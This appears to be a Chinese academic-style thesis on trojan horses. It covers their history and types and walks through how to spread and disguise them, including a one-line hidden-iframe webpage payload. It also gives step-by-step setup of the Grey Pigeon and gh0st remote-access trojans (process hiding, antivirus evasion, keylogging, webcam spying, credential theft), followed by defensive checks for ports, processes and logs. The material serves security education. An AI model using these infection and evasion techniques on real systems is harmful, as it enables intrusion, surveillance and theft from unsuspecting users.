木马的攻击过程（原来黑客是这么玩弄木马的）

木马应用与分析

---

近年来互联网现状不容乐观，网络可以说是病毒、木马横行，在上网的同时我们保持警惕，因为你一不小心就可能在浏览网页的同时也运行了黑客们挂在网页上的木马。作为网络安全管理人员，认真地研究木马攻击技术，熟悉木马攻击手段与过程，提前做好应对策略是防御木马攻击的有效途径。尤其是现代网络应用日益普及的背景下，研究木马对网络与信息安全是如何构成极大危险的、对提高人们的用网的安全意识具有重要意义。

本课题在深入研究国内外木马技术与发展方向的基础上，介绍了木马的发展与现状以及木马组成与特性。用实例演示实现木马的隐藏、危害性等基本特性，实现对服务端的远程控制、文件上传下载、视频和音频监控等功能。本课题细致地描绘了木马的上线和传播过程，并用国内比较常见的远控软件来实例演示，生动的演示了木马客户端对服务端的控制，并探讨了针对如何防范木马的防范策略。

关键词：特洛伊木马；肉鸡； 远控；入侵

Abstract

In recent years, the Internet is not optimistic, the network can be said to be a virus, Trojan horse rampant in the Internet at the same time we remain vigilant, because you may accidentally browsing the web while also running the Trojan hackers hang on the page. As a network security management, careful study of the Trojan attack techniques, familiar with the Trojan horse attacks and process ahead of coping strategies is an effective way of defense against Trojan attacks. Especially in the context of the growing popularity of modern Web applications, research Trojan on network and information security is what constitutes a great danger of great significance to improve the safety awareness of people with network.

This subject in depth study of a Trojan technology at home and abroad and the direction of development on the basis of the development and status of the Trojans and Trojan composition and characteristics. Example demonstrates the basic characteristics of the Trojan hidden dangers, on the service side of the remote control, file upload download video and audio monitoring. This topic and meticulously depicts the Trojan on the line and the dissemination process, and with domestic relatively common the remote control software to an instance of demonstration, a vivid demonstration of the Trojans customer-side control on the service side, and explore the for how to guard against Trojan horses of the prevention strategy.

Key words : Trojan Horses;Broiler; Remote Control; Invasion

特洛伊木马

1 引言

随着计算机网络技术的飞速发展，尤其是互联网应用变得更加普及，在互联网上信息是公开透明的，拥有海量的信息，世界从此变得更加近了。但是网络的开放性、自由性和透明性也产生了许多安全隐患。当互联网刚起步的时候，当时网络上病毒横行，很多计算机上都存在许多病毒，后来网络信息的安全性变得日益重要起来了，被信息社会的各个领域所重视起来了。

目前，全世界的经济、社会、文化、科学、军事各个方面都越来越依赖于计算机网络，人类社会对计算机的依赖达到了空前的记录。正是因为人们对计算机的依赖性越来越强，再加上网络本身的脆弱性，越来越多的网络安全方面的问题被人们所知晓，一旦计算机网络受到攻击而不能正常工作、甚至出现瘫痪，整个社会将会陷入危机。

在我国，黑客刚开始不怎么普及，但是自从冰河的出现，国内的黑客爱好者越来越多了，那时候涌现出了很多黑客界的高手。而冰河，作为一个国产木马的鼻祖，当时在早期国内的互联网中流行极广，几乎每一百台计算机就有两三台中了该木马。随着时间的流逝，木马技术发展日益成熟，后来就出现了灰鸽子，灰鸽子可以说是国内后门的集大成者，其丰富而强大的功能，比起前辈冰河、黑洞来，技术明显更加成熟了。当灰鸽子一出现，成千上万的黑客爱好者利用它对计算机进行入侵。

近段时间，利用计算机木马程序实施网络犯罪的案例不断出现，像盗取银行帐号密码、游戏装备乃至个人隐私，林林总总，让人防不胜防。一条看不见、摸不着的黑客产业链正在形成。有一个数据可能很多人都想不到，那就是中国的木马产业链一年的收入已经达到了上百亿元，非常惊人。前几年，湖北麻城市警方就破获了一个制造传播木马的网络犯罪团伙。这也是国内破获的第一个上下游产业链完整的木马犯罪案件。

特洛伊木马造成的危害是非常惊人的，由于它具有远程控制机器以及捕获屏幕、音频、视频的功能，所以其危害程度要远远超过普通的病毒和蠕虫。深入了解特洛伊木马的运行原理，在此基础上采取正确的防卫措施，只有这样才能有效减少特洛伊木马带来的危害。

1.1 木马的起源

木马来源于“特洛伊木马”（Trojan-horse）简称“木马”，据说这个名称来源于希腊神话《木马屠城记》。古希腊有大军围攻特洛伊城，久久无法攻下。于是有人献计制造一只高二丈的大木马，假装作战马神，让士兵藏匿于巨大的木马中，大部队假装撤退而将木马摈弃于特洛伊城下。城中得知解围的消息后，遂将“木马”作为奇异的战利品拖入城内，全城饮酒狂欢。到午夜时分，全城军民尽入梦乡，匿于木马中的将士开秘门游绳而下，开启城门及四处纵火，城外伏兵涌入，部队里应外合，焚屠特洛伊城。后世称这只大木马为“特洛伊木马”。如今黑客程序借用其名，有“一经潜入，后患无穷”之意。 完整的木马程序一般由两个部份组成：一个是服务器程序，一个是控制器程序。“中了木马”就是指安装了木马的服务器程序，若你的电脑被安装了服务器程序，则拥有控制器程序的人就可以通过网络控制你的电脑、为所欲为，这时你电脑上的各种文件、程序，以及在你电脑上使用的帐号、密码就无安全可言了。 木马程序不能算是一种病毒，但越来越多的新版的杀毒软件，已开始可以查杀一些木马了，所以也有不少人称木马程序为黑客。

1.2 木马的分类

木马程序技术发展至今，已经经历了四代：

第一代木马只是简单的密码窃取，发送等没有什么特别之处。

第二代木马，在技术上有了很大的进步，冰河可以说是国内木马的典型代表之一。

第三代木马，在数据传递技术上，又做了不少的改进，出现了ICMP类型的木马，利用畸形报文传送数据，增加了查杀的难度。

第四代木马，在进程的隐藏方面，采用了内核插入式的嵌入方式 ，利用远程插入线程技术，嵌入DLL线程，或者挂接PSAPI，实现木马的隐藏，甚至在windows NT/2000下，都能达到良好的隐藏效果。

总的来说木马可以分为以下几类：

• 远程控制型木马

这是现在最流行的木马，每个人都想拥有这样的木马，因为他们可以控制别人的电脑就像控制自己的电脑一样。灰鸽子就是此类木马的佼佼者，它使用起来非常简单，只需要某人运行服务器，就可以对他的计算机有完全的访问和控制权。

• 发送密码型木马

这类木马的目的是得到用户的一些游戏、QQ、银行等账号和密码，然后利用这些获得的账号和密码从事非法活动。绝大多数木马都是通过asp收信和邮箱收信这两种方式来获取账号和密码的，现在网上很多人都在做这种非法的事，所以该类木马的危害还是比较大的。

• 破坏性木马

这种木马唯一功能就是破坏和删除文件，非常简单易用，他们能自动删除受害人计算机上所有后缀名为DLL、EXE、INI文件。这是非常危险的木马，一旦被感染，又没有及时清理，受害人的计算机信息将不再存在。比如：硬盘炸弹，只要运行这个木马，你的C盘的所有数据将毁于一旦。

• FTP型木马

这种木马在你的电脑中打开端口21，让任何有FTP客户软件的人都可以不用密码就能连接上你的电脑并自由上传和下载，这是最常用的木马，危险很大。

2 木马的工作原理

2.1 木马系统的组成

一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。

1) 硬件部分：建立木马连接所必须的硬件实体。控制端：对服务端进行远程控制的一方。 服务端：被控制端远程控制的一方。INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。

2) 软件部分：实现远程控制所必须的软件程序。控制端程序：控制端用以远程控制服务端的程序。木马程序：潜入服务端内部，获取其操作权限的程序。木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。

3) 具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马程序。

用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步(具体可见图2-1)，下面我们就按这六步来详细阐述木马的攻击原理。

图 2-1 木马的攻击原理

2.2 木马的传播与伪装

单单配置一个木马是没有用的，当我们配置完一个木马的时候，我们就应该想到的是要怎么才能将它传播出去，让别人点击它，让点击的用户成为我们所说的“肉鸡”。但是这时候我们又再想怎么才能让对方轻易地去运行我们所发送的木马呢？这时候，我们考虑到如何伪装我们的木马，达到混淆别人的目的，所以这就要考验我们对木马伪装的能力了。以下我们就来讨论研究下，黑客是怎样将木马传播出去的，怎么对木马进行伪装。

2.2.1 捆绑欺骗

把木马服务端和某个游戏、图片、电影、音乐等文件捆绑成一个新的文件在QQ、邮件、论坛上等地方发送给别人或提供下载链接。当用户接收到该捆绑文件后，运行之后，能够正常显示该捆绑文件中的正常文件的内容，但是服务端已经悄悄地在用户的后台自动运行了。

此方法可用于对电脑安全意识比较薄弱的人，才可以起到很好的迷惑作用。

2.2.2 修改图标欺骗

现在大多数有点水平的骇客在配置完木马并测试后，再准备拿去传播的时候，都会先重复下4.1步骤，然后再利用图标替换等工具将木马的图标替换成能够迷惑对方的图标，比如他们可以将图标改成HTML,TXT, ZIP等各种文件的图标,这是有相当大的迷惑性。

此方法可用于那些很少接触电脑或是一个菜鸟级别的电脑用户。

2.2.3 直接发送

直接将木马服务端发给对方，让对方运行，对方运行后发现毫无反应（运行木马后的典型表现，木马自动销毁），他就会问你说：“为什么运行了那个程序后，那个程序却消失了”。你可以这样回答他：“是吗，可能程序出错了吧，没事的，我再重新发个给你”，然后你就可以把正确的程序发给他，他收到后还可能跟你说声谢谢呢，殊不知已经成为了你的“肉鸡”了。

此方法可用于那些电脑没有装杀毒软件或没有及时更新杀毒软件的用户。

2.2.4 QQ冒名欺骗

你必须先拥有一个不属于你自己的QQ号，这可能就需要你去盗取别人的号码了（这个方法只是提下而已，请大家不要去尝试，并不是鼓励大家去盗号），然后你登入那个盗来号码给他的好友们群发木马程序，并加上一些容易让人相信的文字让对方去下载并运行，由于那些好友中肯定有一些信任被盗号码的主人，他们就会毫不犹豫地下载并运行你发给他们的木马程序，结果他们就中招了。

此方法可用于那些平时电脑不注意杀毒，且没有对QQ进行安全的密码保护的用户。

2.2.5 邮件冒名欺骗

和4.4方法类似，用匿名邮件工具冒充好友或大型网站、机构单位向别人群发木马附件，别人下载附件并运行的话就中木马了。

此方法可用于那些随便接受并打开来路不明的邮件或将邮件的附件下载下来却没有杀毒就运行的用户。

2.2.6 上传到门户网站让人下载

由于大多数的门户网站都很少会对用户上传的文件进行杀毒或后门的检测，这时候，我们就可以利用这个来进行木马的传播。首先我们先配置好一个木马，然后在利用4.1和4.2提到的方法对木马进行捆绑和图标的修改，将木马与正常的软件捆绑在一起，并修改它的图标，将它的名字改成那款正常软件的名称，最后，我们就可以将该木马上传到门户网站上，让广大的用户下载了。

此方法主要是利用一些门户网站对用户上传的文件没有进行严格的审查，也利用那些去下载软件的用户的侥幸心理，因为他们一般觉得在门户网站下载的软件都是绿色软件，是没有病毒的，这种侥幸心理恰恰受到黑客们的喜欢。

2.2.7 zip伪装

这个方法其实很简单，它主要是利用上面我们讲过的4.1和4.2的内容。它的原理是将一个木马和一个已损坏的zip包（可自制）捆绑在一起，然后将捆绑后的文件的图标改为zip图标，这样一来，除非比较细心的人看了他的后缀，否则点下去的效果将和一般损坏的zip没什么两样，根本不知道其实自己已经成为了别人的“肉鸡”了。

2.2.8 网页挂马

网页挂马就是攻击者利用某网站存在的漏洞，进而利用该漏洞对该网站进行入侵，最终取得webshell。然后通过自己配置和经过调试过的网马的地址批量插入或指定插入某个页面，从而达到挂马的目的。常见的挂马方式是框架嵌入式网络挂马，其主要利用iframe语句，代码格式为：

<iframe src=xxx/muma.html width=0 height=0></iframe>

当浏览者打开刚网页后，除了加载该网页本身的内容后，还会加载攻击者在该网页上添加的这一句代码，这时浏览者的电脑就会悄悄的远程下载该木马并且运行，这时候如果该浏览者电脑上没有杀毒软件或杀毒软件过期，那么他将会在自己毫不知情的情况下成为了攻击者的“肉鸡“了。

该方法可以说是木马传播速度最快也是最为隐秘的手段了，大多数的黑客爱好者都是喜欢用这个方法来传播木马的，他们一般都热衷于入侵那些有注入点或有漏洞的网站，取得它们的webshell后，进行批量挂马。一般这些人他们的编程水平和数据库的知识都是很有一定基础的，如果他们将这些知识和经验利用到安全领域的话，应该会有一番作为的。

此方法的运用范围广，所有用过电脑上网的人都有可能会中招，不过这也不是不能防范的，只要我们平时注意杀毒软件的更新，还有装一些针对网页挂马的防护软件，一般你不小心浏览到有挂马的网站的时候，这些软件就会提醒你该网页可能存在网页木马信息，提醒你不要去浏览，这样我们就可以避免在浏览网页的时候，在毫无之情的情况下成为了人家的“肉鸡”了。

3 典型木马介绍

说了那么多木马，接下来我们也来说说生成这些木马的工具。这些木马工具，我们也称为远程控制软件，本来这些远程控制软件是用于企事业单位、个人用户，提供远程办公，企业及个人用户节省人物财力的同时，提高工作效率。这些远程控制软件一般都有以下功能：远程开关机，批量管理电脑，遥控鼠标、键盘，屏幕监控，文件管理，低成本打造智能安防监控系统等服务。

但是就是有些居心不良的人，利用这些软件进行黑客入侵，对个人、或企事业单位的电脑进行破坏。以下我们就通过介绍两款国内比较常见的远程控制软件来进行实例演示，来讲解黑客们是怎样“肉鸡”成群、怎样监控“肉鸡”，并了解下这些“肉鸡”有什么用途。

3.1 灰鸽子远控实例演示

3.1.1 灰鸽子远控的介绍

灰鸽子(Backdoor.gpigeon)是国内一款著名后门。比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

灰鸽子客户端和服务器端都采用Delphi代码编写。黑客利用客户端程序即可配置出服务端程序。可配置的信息主要包括上线类型、主动连接时使用的公网IP（域名）、连接密码、使用的端口、启动项名称、服务名称、进程隐藏方式、使用的壳、是否启用代理、图标修改等。

3.1.2 灰鸽子的配置

首先我们先打开灰鸽子2007黑防无壳专版（图3-1）：

3-1 灰鸽子主界面

查看系统配置（图3-2）：

图3-2 系统设置

在这边我们主要可以对鸽子的上线端口进行修改，从上面我们可以看出我们的上线端口是8000。

点击配置服务端，我们来配置下服务器，首先是自动上线配置，具体如图3-3所示：

图3-3 自动上线设置

由于我是本地测试，所以使用的是本地的ip：127.0.0.1，也可以使用域名上线，大家可以到3322自己注册申请域名，再利用该软件提供的域名更新工具，对自己的域名进行在线IP更新，这样每次运行该更新工具，就能实现域名的IP地址每时每刻都指向我们的计算机，这样服务端每次连接到该域名的时候就能通过该域名连接到我们计算机上的客户端了。此处我不主要介绍ftp上线，因为ftp上线比较繁琐，还要上网找个免费的空间，然后收发上线信息，所以我提倡使用域名上线比较方便快捷。

安装选项（图3-4）：

图3-4安装选项

在这个选项中，我们应该注意的是安装路径的修改和安装成功后自动删除安装文件。本来默认的安装目录是$(WinDir)\Hacker.exe，这时候我们就应该将路径改成在系统路径或其他路径，名称也要改了，不然别人一看hacker就知道是木马了。最重要的一点就是，要记得将安装成功后自动删除安装文件打钩，因为这个打钩之后，别人运行你的服务端后，文件将会自动删除，或者你入侵别人电脑的时候，就可以很隐蔽的运行该木马之后，而不会留下痕迹。

启动项设置（图3-5）：

图 3-5 启动项设置

这边注意的是将显示名称、服务名称、描述信息修改成跟系统文件相似的就行，这样可以起到迷惑的作用。

代理服务：

这项功能我们可以先不配置，我们可以等到“肉鸡”上线了再启用也行，现在很多黑客利用“肉鸡”的代理，主要是为了做跳板也有的是为了利用代理从事非法勾当，比如刷QQ砖，盗QQ号等。

高级选项（图3-6）：

图 3-6 高级选项

这个选项我们可以将前两项打钩了，特别是第二项，隐藏服务端进程，这个功能确实挺好的，至于加壳不加壳可以等生成完服务端，自己上网找些比较少见，比较强悍的壳再加，因为使用灰鸽子自带的UPX已经没什么效果了，达不到免杀的目的。

插件功能：

这个选项主要是给服务端新增加一些新的功能，比如常见的中英文键盘记录插件，通过这些插件的安装，使得灰鸽子的功能更加强大。

接下来我们就可以利用我们配置的木马服务端来进行种植了，但是看到这个图

标就有点让人不怎么相信，所以我们可以利用4.2节所讲述的内容并结合以下工具进行图标的修改（图3-7）：

图 3-7 图标替换

我们将一个文件夹的图标将原来的图标给替换掉，结果就变成这样（图3-8）：

图 3-8 木马属性

相信经过这样修改过后，会更加迷惑大家，我们还可以利用4.1节所讲的内容进行捆绑，由于篇幅有限，这边不做另外的介绍。

最后，我们将服务端发送给别人进行测试。

灰鸽子服务端功能测试：

我们打开客户端进行查看是否有上线（图3-9）：

图 3-9 上线演示

主机已上线，说明前面我们配置的都没有问题，接下来我们将要测试下灰鸽子这个版本的一些比较常见的功能：

1) 捕获屏幕（图3-10）：

图 3-10 远程屏幕

利用该功能，我们可以很清楚的查看到对方现在在干嘛，可以完全监控对方一举一动（大家千万别去尝试，因为这样做是犯法的，是侵犯人家隐私权的），而且我们还可以远程控制对方的电脑，就像使用自己的电脑一样。

2) 视频语音（图3-11）：

图 3-11 视频语音

该功能可以说是严重侵犯个人隐私权，因为你在人家不知情的情况下，打开人家的视频，偷窥别人隐私，很多破坏者利用这些工具拍下一些个人隐私，从而像对方勒索，谋取暴利，这是犯罪，所以大家别去尝试，我们只作为研究而已。

3) Telnet（图3-12）：

图 3-12 telnet远程控制

通过telnet功能，我们能够在对方正在操作电脑的情况下，通过cmd命令，实现文件的上传、下载以及删除、运行等操作，而不被对方发现，就像我们操作我们自己的电脑一样，很方便，很实用。

1) 远程控制命令（图3-13）：

图 3-13 远程控制命令

远程控制命令这个选项中，包含很多功能，大家可以看看和自己研究下，这边不做介绍了。

5) 注册表编辑器（图3-14）：

图 3-14 注册表编辑器

我们可以通过注册表编辑器远程实现对远程主机注册表的修改和删除，就好像在修改自己电脑的注册表一样方便。

6) 命令广播（图3-15）：

图 3-15 命令广播

命令广播顾名思义也就是可以批量处理这些“肉鸡”，可以让它们打开一些网站刷流量、可以让它们全部下载一个文件、批量修改备注或卸载服务端等操作。

到此为止，我们将灰鸽子这款远控的基本的上线配置、服务端的配置、服务端运行以及一些伪装的方式进行了简单的介绍，接下来我们再来介绍一款功能虽说没有灰鸽子多，但是稳定性很好的远控——gh0st。

3.2 gh0st远控实例演示

3.2.1 gh0st远控的介绍

控制端采用IOCP模型，数据传输采用zlib压缩方式，稳定快速，上线数量无上限，可同时控制上万台主机，控制端自动检测CPU使用率调整自己的工作线程, 稳定高效，宿主为svchost以系统服务启动,有远程守护线程,上线间隔为两分钟。心跳包机制防止意外掉线，支持HTTP和DNS上线两种方式。自动恢复SSDT,安装本程序需要管理员权限，控制端237K，返朴归真的界面，生成的服务端无壳，111 KB，可安装多个服务端。

3.2.2 gh0st的配置

首先我们先看下该款远控的主界面（也是Connections页面）（图3-16）：

图 3-16 gh0st主界面

由于这款软件配置比较简单，所以我们就简要配置下，我们打开配置服务端（Settinos）页面（图3-17）：

图 3-17 gh0st系统配置

我们按照上面的配置就行，主要要注意的是上线的方式，我采用的是IP上线（也可以参考上面所说的域名上线），端口设置为8001。这时候就有人会问：“那个上线字串是干嘛用的？”。上线字串是该远控利用自身的加密手段对域名进行加密，然后配置成服务端。我们先复制下上线字串的内容，然后转到生成服务端的页面（Build）（图3-18）：

图 3-18 gh0st服务端生成

这时候我们将刚才复制的上线字串粘贴到域名上线字串，然后点击生成服务端，之后我们再通过一些工具对该木马进行加壳、图标修改或捆绑等操作，然后再将该木马传播到出去（图3-19）。

图 3-19 服务端属性

由于篇幅有限，这边就不进行图标的修改和捆绑操作了，我们直接发送给对方进行测试看看。

gh0st服务端功能测试：

我们打开Connections页面进行查看是否有主机上线（图3-20）：

图 3-20 主机上线

这款远控主要有以下功能（图3-21）：

图 3-21 gh0st功能

该远控的功能很多都是跟灰鸽子差不多的，我们这边只提一些比较强大、比较有改进的地方有以下几个功能：

屏幕控制：此模块全用汇编编写，传输速度快，控制屏幕，发送Ctrl Alt Del，剪贴板操作，7种色彩显示方式。（图3-22）

图3-22 屏幕监控

键盘记录：可记录中英文信息，离线记录(记录上限50M)功能。此功能灰鸽子就没有集成在里面的功能，还要通过下载键盘记录的插件才可以使用该功能。利用该功能，我们可以记录对方的QQ密码、邮箱密码、甚至一些银行卡号的密码，这就是为什么众多黑客都想要往鸽子中装入这种插件（偷看别人密码，从中获取暴利，是违法的，要负刑事责任，请大家千万别去尝试）。（图3-23）

图 3-23 键盘记录

系统管理：进程管理，窗口管理，拨号上网密码获取。在这边我要特别提下系统管理里面的拨号上网密码获取，这个功能确实不错，我们可以直接看到对方电脑的宽带上网的账号和密码，很多黑客初学者，初衷都只是利用黑客软件，盗取别人的QQ号码、游戏账号或宽带账号密码，当他们获取到用户的宽带账号密码的时候，他们可以利用代理在本机登陆互联星空这个网站，利用宽带账号和密码给自己的QQ刷砖，这就是为什么很多家庭用户平时电话没怎么打，但是话费却经常上百，其实是他们被盗刷了还被蒙在鼓里。由于本实验是在局域网上做测试的，所以不能获取到账号和密码，大家有兴趣的话，可以在家里的电脑自己测试下，要注意的是，不能用连接路由上网的电脑测试，要用那些外网用户也就是直接拨号上网的用户才能测试。（图3-24）

图 3-24 系统管理

该款远控的基本介绍到此为止，其他的一些功能都只是模仿灰鸽子的，所以这边不做特别介绍了。

这款远控与灰鸽子相比，2款都是很不错的远控软件，灰鸽子功能强大点，这点从它历经数年还是经久不衰，大多数的人还都是在用灰鸽子。而gh0st这款远控是模仿众多远控写出来的，它比较小巧，而且稳定，在一些功能上如屏幕监控就做的很好，所以说这两款软件不好比较，看个人喜好而定了。

4 如何防范木马

4.1 查看端口

端口是黑客入侵之门，所以检查主机的时候首当其冲的就是要检查端口的开放情况和连接情况。

在windows NT 系统中，通过运行cmd，切换到命令行中输入“netstat –an –o”查看一下主机打开了哪些端口，再根据这些端口来判断是哪些服务所开的端口，如果有些不认识的端口有正在连接，我们就可以根据里面提供的进程号PID到进程表中查看是哪个程序在运行。

我们就以中了灰鸽子的木马的主机做下实验，看该主机在没有打开任何程序或网页的情况下，端口的开放情况，截图如下（图4-1）：

图 4-1 端口开放情况

依照这个列表我们可以看到主机开放一些比较常用的端口，状态为“LISTENING”表示某端口正在监听，还没有和其他计算机建立连接；状态为“ESTABLISHED”表示正在和某计算机进行通信，并将通信计算机的IP地址和端口号显示出来。图26我们可以看到本机1067端口正与远程主机IP为127.0.0.1端口为8001的主机进行通信，而奇怪的是我们在这台计算机上并没有上网，也没有一些软件可以自动连接到互联网的。如果遇到这种情况的话，我们就应该提高警惕，因为你可能已经中了木马了（这是刚才实验留下的gh0st木马），应该及时更新杀毒软件，然后断开网络，在本地环境下进行全盘杀毒。

网络服务需要通过端口提供服务，常见的端口、端口使用的协议及该端口提供的服务如表4-1所示。

表4-1 常用服务端口列表

端口	协议	服务
21	TCP	FTP服务
23	TCP	TELNET服务
25	TCP	SMTP服务
53	TCP/UDP	DNS服务
80	TCP	Web服务
135	TCP	RPC服务
137	UDP	NetBIOS域名服务
138	UDP	NetBIOS数据报服务
139	TCP	NetBIOS会话服务
443	TCP	基于SSI的HTTP服务
445	TCP/UDP	Microsoft SMB服务
3389	TCP	Windows终端服务

4.2 查看进程

打开任务管理器，查看下进程列表，选择查看→选择列→将PID（进程标示符）打钩，然后返回查看进程列表，看一下是否存在可疑进程。我们还是以上面灰鸽子实验那台主机为例子，查看主机的进程列表，截图如下（图4-2）：

图 4-2 查看任务管理器

结合图4-1和图4-2，我们基本上可以确定进程号为396的程序是一个木马程序，首先，我们先应该结束该进程，然后再进行杀毒。

4.3 查看计算机管理

打开计算机管理窗口，首先查看用户和用户组管理，看是否有可疑的用户存在，是否在用户组中存在不应该有的账号。

接着我们查看共享文件夹，是否有把系统默认的隐藏共享删除掉，为了安全起见应该将共享文件夹全部关闭，或者是给它设置只读权限，而不给予写入的权限。

最后需要查看的就是服务了，入侵者为了便利往往将木马程序启动为服务，并赋予服务一个非常具有欺骗性的名称。为了安全起见，我们可以关闭一些不常用的端口，比如21、23、445、3389、4899等这些经常被用于入侵的端口。（445端口是一个毁誉参半的端口，有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机，但也正是因为有了它，黑客们才有了可乘之机，他们能通过该端口偷偷共享你的硬盘，甚至会在悄无声息中将你的硬盘格式化掉！我们可以通过修改注册表 “HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters”里面的值来关闭445端口）

4.4 检查文件列表

一般的后门程序都安装在系统目录下，黑客也喜欢把他们的文件放置在系统目录里面，因为系统目录很少有人检查而且很多文件都是隐藏着的，所以相对比较安全。

我们最好借助一定的工具，比如用Regsnap为例，该软件是一个注册表快照工具，通过它可以详细的了解注册表及其他与系统有关项目的修改和变化情况。

4.5 查看日志

进入控制面板中的“性能和维护”，选择“管理工具”中的“事件查看器”选项，即可查看系统日志。

我们可以检查日记记录是否出现断裂，是否有可疑的账号登录，是否在特定的时间段内发生不应该发生的事件。总之，日志查看器是返现入侵手段的最有效的途径，所以为了保证计算机在安全环境下的正常运行，用户最好经常检查一下系统的日志。

5 参考文献

[1] 武新华等.黑客攻防技术（第二版）[M].北京:中国铁道出版社,2007（12）:51

[2] 石志国等.计算机网络安全教程（修订版）[M]．北京:清华大学出版社；北京交通大学出版社,2007(1):49

[3] 王玲 钱华林.IPV6的安全机制及其对现有网络安全体系的影响[J].微电子学与计算机,:.

[4] 卢勇焕;郑海允;崔吉俊.黑客与安全,2001

[5] 牛华伟.于静.木马防护系统的设计与实现,信息安全与通信保密,2009(10)

[6] 胡卫.马常楼.秦艳琳.廖巍.基于Windows系统的木马程序隐蔽行径分析,计算机与数字工,2009(10)

[7] 张瑞霞.一种实用的反木马策略,计算机安全,2009(9)

“

如需相关资料，请关注公众号，回复留言。

,